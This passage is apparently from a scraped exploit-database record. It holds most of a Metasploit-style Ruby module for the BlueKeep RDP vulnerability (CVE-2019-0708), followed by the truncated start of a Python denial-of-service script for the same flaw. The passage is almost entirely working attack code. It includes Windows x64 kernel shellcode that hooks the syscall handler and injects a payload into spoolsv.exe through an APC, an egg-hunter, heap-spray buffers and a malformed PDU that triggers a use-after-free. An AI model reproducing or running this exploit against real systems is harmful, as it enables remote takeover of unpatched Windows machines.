instructions as repnz\r\n # https://github.com/jjyg/metasm/pull/40\r\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4')\r\n\r\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\r\n\r\n # Fixup above rewritten instructions with the relative label offsets\r\n encoded.reloc.each do |offset, reloc|\r\n target = reloc.target.to_s\r\n if encoded.export.key?(target)\r\n # Note: this assumes the address we're fixing up is at the end of the\r\n # instruction. This holds for 'lea' but if there are other fixups\r\n # later, this might need to change to account for specific instruction\r\n # encodings\r\n if reloc.type == :i32\r\n instr_offset = offset + 4\r\n elsif reloc.type == :i16\r\n instr_offset = offset + 2\r\n end\r\n encoded.fixup(target => encoded.export[target] - instr_offset)\r\n else\r\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\r\n end\r\n end\r\n encoded.fill\r\n encoded.data\r\n end\r\n\r\n # The user mode payload has two parts. The first is an egg hunter that searches for\r\n # the kernel mode payload. The second part is the actual payload that's invoked in\r\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\r\n # and user mode payloads around the heap in different packets because we don't have\r\n # enough space to put them both in the same chunk. Given that code exec can result in\r\n # landing on the user land payload, the egg is used to go to a kernel payload.\r\n def user_mode_payload\r\n\r\n asm = %Q^\r\n_start:\r\n lea rcx, [rel _start]\r\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\r\n_egg_loop:\r\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\r\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\r\n mov rdx, [rcx - 8]\r\n cmp rdx, r8\r\n jnz _egg_loop\r\n jmp rcx\r\n ^\r\n egg_loop = assemble_with_fixups(asm)\r\n\r\n # The USERMODE_EGG is required at the start as well, because the exploit code\r\n # assumes the tag is there, and jumps over it to find the shellcode.\r\n [\r\n USERMODE_EGG,\r\n egg_loop,\r\n USERMODE_EGG,\r\n payload.raw\r\n ].pack('<Qa*<Qa*')\r\n end\r\n\r\n def kernel_mode_payload\r\n\r\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\r\n #\r\n # This shellcode was written originally for eternalblue exploits\r\n # eternalblue_exploit7.py and eternalblue_exploit8.py\r\n #\r\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\r\n #\r\n # Note:\r\n # - The userland shellcode is run in a new thread of system process.\r\n # If userland shellcode causes any exception, the system process get killed.\r\n # - On idle target with multiple core processors, the hijacked system call\r\n # might take a while (> 5 minutes) to get called because the system\r\n # call may be called on other processors.\r\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\r\n # This is ok because some Windows functions do not require a shadow stack.\r\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\r\n # Note: the Windows 8 version macros are removed below\r\n # - The userland payload MUST be appened to this shellcode.\r\n #\r\n # References:\r\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\r\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\r\n\r\n data_kapc_offset = 0x10\r\n data_nt_kernel_addr_offset = 0x8\r\n data_origin_syscall_offset = 0\r\n data_peb_addr_offset = -0x10\r\n data_queueing_kapc_offset = -0x8\r\n hal_heap_storage = 0xffffffffffd04100\r\n\r\n # These hashes are not the same as the ones used by the\r\n # Block API so they have to be hard-coded.\r\n createthread_hash = 0x835e515e\r\n keinitializeapc_hash = 0x6d195cc4\r\n keinsertqueueapc_hash = 0xafcc4634\r\n psgetcurrentprocess_hash = 0xdbf47c78\r\n psgetprocessid_hash = 0x170114e1\r\n psgetprocessimagefilename_hash = 0x77645f3f\r\n psgetprocesspeb_hash = 0xb818b848\r\n psgetthreadteb_hash = 0xcef84c3e\r\n spoolsv_exe_hash = 0x3ee083d8\r\n zwallocatevirtualmemory_hash = 0x576e99ea\r\n\r\n asm = %Q^\r\nshellcode_start:\r\n nop\r\n nop\r\n nop\r\n nop\r\n ; IRQL is DISPATCH_LEVEL when got code execution\r\n\r\n push rbp\r\n\r\n call set_rbp_data_address_fn\r\n\r\n ; read current syscall\r\n mov ecx, 0xc0000082\r\n rdmsr\r\n ; do NOT replace saved original syscall address with hook syscall\r\n lea r9, [rel syscall_hook]\r\n cmp eax, r9d\r\n je _setup_syscall_hook_done\r\n\r\n ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize\r\n cmp dword [rbp+#{data_origin_syscall_offset}], eax\r\n je _hook_syscall\r\n\r\n ; save original syscall\r\n mov dword [rbp+#{data_origin_syscall_offset}+4], edx\r\n mov dword [rbp+#{data_origin_syscall_offset}], eax\r\n\r\n ; first time on the target\r\n mov byte [rbp+#{data_queueing_kapc_offset}], 0\r\n\r\n_hook_syscall:\r\n ; set a new syscall on running processor\r\n ; setting MSR 0xc0000082 affects only running processor\r\n xchg r9, rax\r\n push rax\r\n pop rdx ; mov rdx, rax\r\n shr rdx, 32\r\n wrmsr\r\n\r\n_setup_syscall_hook_done:\r\n pop rbp\r\n\r\n;--------------------- HACK crappy thread cleanup --------------------\r\n; This code is effectively the same as the epilogue of the function that calls\r\n; the vulnerable function in the kernel, with a tweak or two.\r\n\r\n ; TODO: make the lock not suck!!\r\n mov rax, qword [gs:0x188]\r\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\r\n lea r11, [rsp+0b8h]\r\n xor eax, eax\r\n mov rbx, [r11+30h]\r\n mov rbp, [r11+40h]\r\n mov rsi, [r11+48h]\r\n mov rsp, r11\r\n pop r15\r\n pop r14\r\n pop r13\r\n pop r12\r\n pop rdi\r\n ret\r\n\r\n;--------------------- END HACK crappy thread cleanup\r\n\r\n;========================================================================\r\n; Find memory address in HAL heap for using as data area\r\n; Return: rbp = data address\r\n;========================================================================\r\nset_rbp_data_address_fn:\r\n ; On idle target without user application, syscall on hijacked processor might not be called immediately.\r\n ; Find some address to store the data, the data in this address MUST not be modified\r\n ; when exploit is rerun before syscall is called\r\n ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]\r\n\r\n ; ------ HACK rbp wasnt valid!\r\n\r\n mov rbp, #{hal_heap_storage} ; TODO: use some other buffer besides HAL heap??\r\n\r\n ; --------- HACK end rbp\r\n\r\n_set_rbp_data_address_fn_next:\r\n ;shr rbp, 12\r\n ;shl rbp, 12\r\n ;sub rbp, 0x70 ; for KAPC struct too\r\n ret\r\n\r\n ;int 3\r\n ;call $+5\r\n ;pop r13\r\nsyscall_hook:\r\n swapgs\r\n mov qword [gs:0x10], rsp\r\n mov rsp, qword [gs:0x1a8]\r\n push 0x2b\r\n push qword [gs:0x10]\r\n\r\n push rax ; want this stack space to store original syscall addr\r\n ; save rax first to make this function continue to real syscall\r\n push rax\r\n push rbp ; save rbp here because rbp is special register for accessing this shellcode data\r\n call set_rbp_data_address_fn\r\n mov rax, [rbp+#{data_origin_syscall_offset}]\r\n add rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler\r\n mov [rsp+0x10], rax\r\n\r\n ; save all volatile registers\r\n push rcx\r\n push rdx\r\n push r8\r\n push r9\r\n push r10\r\n push r11\r\n\r\n ; use lock cmpxchg for queueing APC only one at a time\r\n xor eax, eax\r\n mov dl, 1\r\n lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl\r\n jnz _syscall_hook_done\r\n\r\n ;======================================\r\n ; restore syscall\r\n ;======================================\r\n ; an error after restoring syscall should never occur\r\n mov ecx, 0xc0000082\r\n mov eax, [rbp+#{data_origin_syscall_offset}]\r\n mov edx, [rbp+#{data_origin_syscall_offset}+4]\r\n wrmsr\r\n\r\n ; allow interrupts while executing shellcode\r\n sti\r\n call r3_to_r0_start\r\n cli\r\n\r\n_syscall_hook_done:\r\n pop r11\r\n pop r10\r\n pop r9\r\n pop r8\r\n pop rdx\r\n pop rcx\r\n pop rbp\r\n pop rax\r\n ret\r\n\r\nr3_to_r0_start:\r\n ; save used non-volatile registers\r\n push r15\r\n push r14\r\n push rdi\r\n push rsi\r\n push rbx\r\n push rax ; align stack by 0x10\r\n\r\n ;======================================\r\n ; find nt kernel address\r\n ;======================================\r\n mov r15, qword [rbp+#{data_origin_syscall_offset}] ; KiSystemCall64 is an address in nt kernel\r\n shr r15, 0xc ; strip to page size\r\n shl r15, 0xc\r\n\r\n_x64_find_nt_walk_page:\r\n sub r15, 0x1000 ; walk along page size\r\n cmp word [r15], 0x5a4d ; 'MZ' header\r\n jne _x64_find_nt_walk_page\r\n\r\n ; save nt address for using in KernelApcRoutine\r\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\r\n\r\n ;======================================\r\n ; get current EPROCESS and ETHREAD\r\n ;======================================\r\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\r\n mov edi, #{psgetcurrentprocess_hash}\r\n call win_api_direct\r\n xchg rcx, rax ; rcx = EPROCESS\r\n\r\n ; r15 : nt kernel address\r\n ; r14 : ETHREAD\r\n ; rcx : EPROCESS\r\n\r\n ;======================================\r\n ; find offset of EPROCESS.ImageFilename\r\n ;======================================\r\n mov edi, #{psgetprocessimagefilename_hash}\r\n call get_proc_addr\r\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\r\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\r\n\r\n\r\n ;======================================\r\n ; find offset of EPROCESS.ThreadListHead\r\n ;======================================\r\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\r\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\r\n\r\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\r\n jb _find_eprocess_threadlist_offset_win7\r\n add eax, 0x10\r\n_find_eprocess_threadlist_offset_win7:\r\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\r\n\r\n ;======================================\r\n ; find offset of ETHREAD.ThreadListEntry\r\n ;======================================\r\n\r\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\r\n mov r9, r8\r\n\r\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\r\n_find_ethread_threadlist_offset_loop:\r\n mov r9, qword [r9]\r\n\r\n cmp r8, r9 ; check end of list\r\n je _insert_queue_apc_done ; not found !!!\r\n\r\n ; if (r9 - r14 < 0x700) found\r\n mov rax, r9\r\n sub rax, r14\r\n cmp rax, 0x700\r\n ja _find_ethread_threadlist_offset_loop\r\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\r\n\r\n\r\n ;======================================\r\n ; find offset of EPROCESS.ActiveProcessLinks\r\n ;======================================\r\n mov edi, #{psgetprocessid_hash}\r\n call get_proc_addr\r\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\r\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\r\n\r\n\r\n ;======================================\r\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\r\n ;======================================\r\n ; check process name\r\n\r\n\r\n xor eax, eax ; HACK to exit earlier if process not found\r\n\r\n_find_target_process_loop:\r\n lea rsi, [rcx+rbx]\r\n\r\n push rax\r\n call calc_hash\r\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\r\n pop rax\r\n jz found_target_process\r\n\r\n;---------- HACK PROCESS NOT FOUND start -----------\r\n inc rax\r\n cmp rax, 0x300 ; HACK not found!\r\n jne _next_find_target_process\r\n xor ecx, ecx\r\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\r\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\r\n\r\n jmp _r3_to_r0_done\r\n\r\n;---------- HACK PROCESS NOT FOUND end -----------\r\n\r\n_next_find_target_process:\r\n ; next process\r\n mov rcx, [rcx+rdi]\r\n sub rcx, rdi\r\n jmp _find_target_process_loop\r\n\r\n\r\nfound_target_process:\r\n ; The allocation for userland payload will be in KernelApcRoutine.\r\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\r\n\r\n ;======================================\r\n ; save process PEB for finding CreateThread address in kernel KAPC routine\r\n ;======================================\r\n mov edi, #{psgetprocesspeb_hash}\r\n ; rcx is EPROCESS. no need to set it.\r\n call win_api_direct\r\n mov [rbp+#{data_peb_addr_offset}], rax\r\n\r\n\r\n ;======================================\r\n ; iterate ThreadList until KeInsertQueueApc() success\r\n ;======================================\r\n ; r15 = nt\r\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\r\n ; rcx = EPROCESS\r\n ; edx = offset of EPROCESS.ThreadListHead\r\n\r\n\r\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\r\n mov rbx, rsi ; use rbx for iterating thread\r\n\r\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\r\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\r\n ; try queueing APC then check KAPC member is more reliable.\r\n\r\n_insert_queue_apc_loop:\r\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\r\n mov rbx, [rbx+8]\r\n\r\n cmp rsi, rbx\r\n je _insert_queue_apc_loop ; skip list head\r\n\r\n ; find start of ETHREAD address\r\n ; set it to rdx to be used for KeInitializeApc() argument too\r\n lea rdx, [rbx + r14] ; ETHREAD\r\n\r\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\r\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\r\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\r\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\r\n ; Teb member is next to Queue member.\r\n mov edi, #{psgetthreadteb_hash}\r\n call get_proc_addr\r\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\r\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\r\n je _insert_queue_apc_loop\r\n\r\n ; KeInitializeApc(PKAPC,\r\n ; PKTHREAD,\r\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\r\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\r\n ; PKRUNDOWN_ROUTINE = NULL,\r\n ; PKNORMAL_ROUTINE = userland_shellcode,\r\n ; KPROCESSOR_MODE = UserMode (1),\r\n ; PVOID Context);\r\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\r\n xor r8, r8 ; OriginalApcEnvironment\r\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\r\n push rbp ; context\r\n push 1 ; UserMode\r\n push rbp ; userland shellcode (MUST NOT be NULL)\r\n push r8 ; NULL\r\n sub rsp, 0x20 ; shadow stack\r\n mov edi, #{keinitializeapc_hash}\r\n call win_api_direct\r\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\r\n\r\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\r\n ; SystemArgument1 is second argument in usermode code (rdx)\r\n ; SystemArgument2 is third argument in usermode code (r8)\r\n lea rcx, [rbp+#{data_kapc_offset}]\r\n ;xor edx, edx ; no need to set it here\r\n ;xor r8, r8 ; no need to set it here\r\n xor r9, r9\r\n mov edi, #{keinsertqueueapc_hash}\r\n call win_api_direct\r\n add rsp, 0x40\r\n ; if insertion failed, try next thread\r\n test eax, eax\r\n jz _insert_queue_apc_loop\r\n\r\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\r\n ; EPROCESS pointer 8 bytes\r\n ; InProgressFlags 1 byte\r\n ; KernelApcPending 1 byte\r\n ; if success, UserApcPending MUST be 1\r\n cmp byte [rax+0x1a], 1\r\n je _insert_queue_apc_done\r\n\r\n ; manual remove list without lock\r\n mov [rax], rax\r\n mov [rax+8], rax\r\n jmp _insert_queue_apc_loop\r\n\r\n_insert_queue_apc_done:\r\n ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\r\n\r\n_r3_to_r0_done:\r\n pop rax\r\n pop rbx\r\n pop rsi\r\n pop rdi\r\n pop r14\r\n pop r15\r\n ret\r\n\r\n;========================================================================\r\n; Call function in specific module\r\n;\r\n; All function arguments are passed as calling normal function with extra register arguments\r\n; Extra Arguments: r15 = module pointer\r\n; edi = hash of target function name\r\n;========================================================================\r\nwin_api_direct:\r\n call get_proc_addr\r\n jmp rax\r\n\r\n\r\n;========================================================================\r\n; Get function address in specific module\r\n;\r\n; Arguments: r15 = module pointer\r\n; edi = hash of target function name\r\n; Return: eax = offset\r\n;========================================================================\r\nget_proc_addr:\r\n ; Save registers\r\n push rbx\r\n push rcx\r\n push rsi ; for using calc_hash\r\n\r\n ; use rax to find EAT\r\n mov eax, dword [r15+60] ; Get PE header e_lfanew\r\n mov eax, dword [r15+rax+136] ; Get export tables RVA\r\n\r\n add rax, r15\r\n push rax ; save EAT\r\n\r\n mov ecx, dword [rax+24] ; NumberOfFunctions\r\n mov ebx, dword [rax+32] ; FunctionNames\r\n add rbx, r15\r\n\r\n_get_proc_addr_get_next_func:\r\n ; When we reach the start of the EAT (we search backwards), we hang or crash\r\n dec ecx ; decrement NumberOfFunctions\r\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\r\n add rsi, r15 ; Add the modules base address\r\n\r\n call calc_hash\r\n\r\n cmp eax, edi ; Compare the hashes\r\n jnz _get_proc_addr_get_next_func ; try the next function\r\n\r\n_get_proc_addr_finish:\r\n pop rax ; restore EAT\r\n mov ebx, dword [rax+36]\r\n add rbx, r15 ; ordinate table virtual address\r\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\r\n mov ebx, dword [rax+28] ; Get the function addresses table rva\r\n add rbx, r15 ; Add the modules base address\r\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\r\n add rax, r15 ; Add the modules base address to get the functions actual VA\r\n\r\n pop rsi\r\n pop rcx\r\n pop rbx\r\n ret\r\n\r\n;========================================================================\r\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\r\n;\r\n; Argument: rsi = string to hash\r\n; Clobber: rsi\r\n; Return: eax = hash\r\n;========================================================================\r\ncalc_hash:\r\n push rdx\r\n xor eax, eax\r\n cdq\r\n_calc_hash_loop:\r\n lodsb ; Read in the next byte of the ASCII string\r\n ror edx, 13 ; Rotate right our hash value\r\n add edx, eax ; Add the next byte of the string\r\n test eax, eax ; Stop when found NULL\r\n jne _calc_hash_loop\r\n xchg edx, eax\r\n pop rdx\r\n ret\r\n\r\n\r\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\r\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\r\n; Moreover, there is no lock when calling KernelApcRoutine.\r\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\r\n;\r\n; VOID KernelApcRoutine(\r\n; IN PKAPC Apc,\r\n; IN PKNORMAL_ROUTINE *NormalRoutine,\r\n; IN PVOID *NormalContext,\r\n; IN PVOID *SystemArgument1,\r\n; IN PVOID *SystemArgument2)\r\nkernel_kapc_routine:\r\n push rbp\r\n push rbx\r\n push rdi\r\n push rsi\r\n push r15\r\n\r\n mov rbp, [r8] ; *NormalContext is our data area pointer\r\n\r\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\r\n push rdx\r\n pop rsi ; mov rsi, rdx\r\n mov rbx, r9\r\n\r\n ;======================================\r\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\r\n ;======================================\r\n xor eax, eax\r\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\r\n ; rdx is already address of baseAddr\r\n mov [rdx], rax ; baseAddr = 0\r\n mov ecx, eax\r\n not rcx ; ProcessHandle = -1\r\n mov r8, rax ; ZeroBits\r\n mov al, 0x40 ; eax = 0x40\r\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\r\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\r\n push rax ; MEM_COMMIT = 0x1000\r\n ; reuse r9 for address of RegionSize\r\n mov [r9], rax ; RegionSize = 0x1000\r\n sub rsp, 0x20 ; shadow stack\r\n mov edi, #{zwallocatevirtualmemory_hash}\r\n call win_api_direct\r\n add rsp, 0x30\r\n\r\n ; check error\r\n test eax, eax\r\n jnz _kernel_kapc_routine_exit\r\n\r\n ;======================================\r\n ; copy userland payload\r\n ;======================================\r\n mov rdi, [rsi]\r\n\r\n;--------------------------- HACK IN EGG USER ---------\r\n\r\n push rdi\r\n\r\n lea rsi, [rel shellcode_start]\r\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\r\n\r\n _find_user_egg_loop:\r\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\r\n mov rax, [rsi - 8]\r\n cmp rax, rdi\r\n jnz _find_user_egg_loop\r\n\r\n _inner_find_user_egg_loop:\r\n inc rsi\r\n mov rax, [rsi - 8]\r\n cmp rax, rdi\r\n jnz _inner_find_user_egg_loop\r\n\r\n pop rdi\r\n;--------------------------- END HACK EGG USER ------------\r\n\r\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\r\n\r\n rep movsb\r\n\r\n ;======================================\r\n ; find CreateThread address (in kernel32.dll)\r\n ;======================================\r\n mov rax, [rbp+#{data_peb_addr_offset}]\r\n mov rax, [rax + 0x18] ; PEB->Ldr\r\n mov rax, [rax + 0x20] ; InMemoryOrder list\r\n\r\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\r\n ;mov rbx, rsi ; use rbx for iterating thread\r\n_find_kernel32_dll_loop:\r\n mov rax, [rax] ; first one always be executable\r\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\r\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\r\n ; offset 0x50 => is name\r\n ; offset 0x20 => is dllbase\r\n ;cmp word [rax+0x38], 0x40\r\n ;jne _find_kernel32_dll_loop\r\n cmp word [rax+0x48], 0x18\r\n jne _find_kernel32_dll_loop\r\n\r\n mov rdx, [rax+0x50]\r\n ; check only \"32\" because name might be lowercase or uppercase\r\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\r\n jnz _find_kernel32_dll_loop\r\n\r\n ;int3\r\n mov r15, [rax+0x20]\r\n mov edi, #{createthread_hash}\r\n call get_proc_addr\r\n\r\n ; save CreateThread address to SystemArgument1\r\n mov [rbx], rax\r\n\r\n_kernel_kapc_routine_exit:\r\n xor ecx, ecx\r\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\r\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\r\n ; restore IRQL to APC_LEVEL\r\n mov cl, 1\r\n mov cr8, rcx\r\n\r\n pop r15\r\n pop rsi\r\n pop rdi\r\n pop rbx\r\n pop rbp\r\n ret\r\n\r\nuserland_start_thread:\r\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\r\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\r\n xor ecx, ecx ; lpThreadAttributes = NULL\r\n push rcx ; lpThreadId = NULL\r\n push rcx ; dwCreationFlags = 0\r\n mov r9, rcx ; lpParameter = NULL\r\n lea r8, [rel userland_payload] ; lpStartAddr\r\n mov edx, ecx ; dwStackSize = 0\r\n sub rsp, 0x20\r\n call rax\r\n add rsp, 0x30\r\n ret\r\n\r\nuserland_payload:\r\n ^\r\n\r\n [\r\n KERNELMODE_EGG,\r\n assemble_with_fixups(asm)\r\n ].pack('<Qa*')\r\n end\r\n\r\n def create_free_trigger(chan_user_id, chan_id)\r\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\r\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\r\n # The extra bytes on the end of the body is what causes the bad things to happen\r\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\r\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\r\n end\r\n\r\n def create_exploit_channel_buffer(target_addr)\r\n overspray_addr = target_addr + 0x2000\r\n shellcode_vtbl = target_addr + HEADER_SIZE\r\n magic_value1 = overspray_addr + 0x810\r\n magic_value2 = overspray_addr + 0x48\r\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\r\n\r\n # first 0x38 bytes are used by DATA PDU packet\r\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\r\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\r\n [\r\n [\r\n # SystemResourceList (2 pointers, each 8 bytes)\r\n # Pointer to OWNER_ENTRY (8 bytes)\r\n # ActiveCount (SHORT, 2 bytes)\r\n # Flag (WORD, 2 bytes)\r\n # Padding (BYTE[4], 4 bytes) x64 only\r\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\r\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\r\n magic_value2, # OwnerThread (ULONG, 8 bytes)\r\n magic_value2, # TableSize (ULONG, 8 bytes)\r\n 0x0, # ActiveEntries (DWORD, 4 bytes)\r\n 0x0, # ContenttionCount (DWORD, 4 bytes)\r\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\r\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\r\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\r\n magic_value2, # Address (PVOID, 8 bytes)\r\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\r\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\r\n [\r\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\r\n magic_value2, # --------------------\r\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\r\n 0x0, # ActiveCount (SHORT, 2 bytes)\r\n 0x0, # Flag (WORD, 2 bytes)\r\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\r\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\r\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\r\n magic_value2, # OwnerThread (ULONG, 8 bytes)\r\n magic_value2, # TableSize (ULONG, 8 bytes)\r\n 0x0, # ActiveEntries (DWORD, 4 bytes)\r\n 0x0, # ContenttionCount (DWORD, 4 bytes)\r\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\r\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\r\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\r\n magic_value2, # Address (PVOID, 8 bytes)\r\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\r\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\r\n [\r\n 0x1F, # ClassOffset (DWORD, 4 bytes)\r\n 0x0, # bindStatus (DWORD, 4 bytes)\r\n 0x72, # lockCount1 (QWORD, 8 bytes)\r\n magic_value3, # connection (QWORD, 8 bytes)\r\n shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)\r\n 0x5, # channelClass (DWORD, 4 bytes)\r\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\r\n 0x1F, # channelIndex (DWORD, 4 bytes)\r\n magic_value1, # channels (QWORD, 8 bytes)\r\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\r\n magic_value1, # list1 (QWORD, 8 bytes)\r\n magic_value1, # list1 (QWORD, 8 bytes)\r\n magic_value1, # list2 (QWORD, 8 bytes)\r\n magic_value1, # list2 (QWORD, 8 bytes)\r\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\r\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\r\n magic_value1, # connResrouce (QWORD, 8 bytes)\r\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\r\n 0x7065656b, # dword15C (DWORD, 4 bytes)\r\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\r\n ].join('')\r\n end\r\n\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33275"}, {"lastseen": "2019-06-01T00:12:39", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2019-05-31T00:00:00", "title": "Microsoft #Windows Remote Desktop - BlueKeep Denial of Service Exploit #RDP #MicrosoftWindows", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-05-31T00:00:00", "id": "1337DAY-ID-32826", "href": "https://0day.today/exploit/description/32826", "sourceData": "import socket, sys, struct\r\nfrom OpenSSL import SSL\r\nfrom impacket.structure import Structure\r\n\r\n# I'm not responsible for what you use this to accomplish and should only be used for education purposes\r\n\r\n# Could clean these up since I don't even use them\r\nclass TPKT(Structure):\r\n\tcommonHdr = (\r\n\t\t('Version','B=3'),\r\n\t\t('Reserved','B=0'),\r\n\t\t('Length','>H=len(TPDU)+4'),\r\n\t\t('_TPDU','_-TPDU','self[\"Length\"]-4'),\r\n\t\t('TPDU',':=\"\"'),\r\n\t)\r\n\r\nclass TPDU(Structure):\r\n\tcommonHdr = (\r\n\t\t('LengthIndicator','B=len(VariablePart)+1'),\r\n\t\t('Code','B=0'),\r\n\t\t('VariablePart',':=\"\"'),\r\n\t)\r\n\tdef __init__(self, data = None):\r\n\t\tStructure.__init__(self,data)\r\n\t\tself['VariablePart']=''\r\n\r\nclass CR_TPDU(Structure):\r\n\tcommonHdr = 